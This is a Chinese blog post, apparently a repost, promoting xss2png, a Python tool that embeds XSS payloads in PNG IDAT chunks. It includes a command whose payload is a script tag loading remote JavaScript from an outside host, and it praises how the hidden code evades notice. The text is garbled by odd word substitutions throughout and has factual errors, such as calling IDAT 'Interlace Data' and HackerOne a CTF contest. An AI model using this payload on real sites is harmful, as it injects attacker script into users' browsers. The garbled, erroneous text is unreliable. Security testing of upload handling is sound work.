探索安全新范畴:xss2png - 将XSS注入伪装成PNG图片的工具
探索安全新范畴:xss2png - 将XSS注入伪装成PNG图片的工具项目地址:https://gitcode.com/gh_mirrors/xs/xss2png
在网络安全的世界中,创新和探索是永不绝歇的主题。本日,我们要向您介绍一款名为xss2png的独特开源工具,它将XSS(跨站脚本攻击)payload奇妙地嵌入到PNG图片的IDAT块中,使得这种常见的网络威胁以一种全新的形式出现。
项目介绍
xss2png是一个简朴的Python工具,由开辟者vavkamil创建,旨在帮助安全研究职员和黑客测试环境中的漏洞。该工具使用PNG图像文件的结构特性,在不改变图像外观的环境下,隐藏恶意的XSS代码。这个想法源于Nathaniel McHugh分享的PHP源码,并在此基础上进行了优化和扩展。
项目技术分析
xss2png的工作原理在于使用了PNG图像文件的IDAT(Interlace Data)块。IDAT块用于存储图像数据,而xss2png则将其变化为存储XSS payload的地方。通过简朴的命令行接口,用户可以指定自己的XSS payload,然后xss2png会天生一个看似无害的PNG图片,但实际上其中蕴含着潜在的危险代码。
~/$ python3 xss2png.py -p "<SCRIPT SRC=//XSS.VAVKAMIL.CZ></SCRIPT>" -o xss.png
天生的PNG图片在查看时并无异常,但一旦被不设防的Web应用步伐处置惩罚,例如上传或分析,就可能触发嵌入的XSS攻击。
应用场景
[*]漏洞测试:对于渗透测试和安全审计来说,xss2png可以帮助发现那些未能正确过滤或编码输入的Web应用漏洞。
[*]CTF挑衅:在网络安全竞赛如Hackerone中,可能需要如许的工具体验临时图像挑衅。
[*]研究与教诲:明白XSS攻击的新形式,提高对Web安全的认识。
项目特点
[*]简朴易用:通过命令行参数轻松定制XSS payload并天生PNG图片。
[*]潜伏性强:肉眼无法察觉藏于PNG内的恶意代码,增加了攻击的成功率。
[*]兼容性广:大多数Web服务器和浏览器都支持PNG格式,这意味着嵌入的XSS payload有更广泛的传播范围。
[*]可扩展性:基于现有框架,可以为其他用途进行扩展和改进。
通过xss2png,我们可以重新审阅Web安全的界限,并提示自己,无论威胁怎样演变,保持鉴戒和学习新技能始终至关重要。立即加入这场技术的探索之旅,体验创新的安全测试方法!
GitHub堆栈链接 | 相识更多相关文章
相关资源
[*]PHP shell on PNG's IDAT Chunk
[*]Encoding Web Shells in PNG IDAT chunks
[*]Bug-hunter's Sorrow
[*]An XSS on Facebook via PNGs & Wonky Content Types
[*]Revisiting XSS payloads in PNG IDAT chunks
xss2png PNG IDAT chunks XSS payload generator项目地址: https://gitcode.com/gh_mirrors/xs/xss2png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]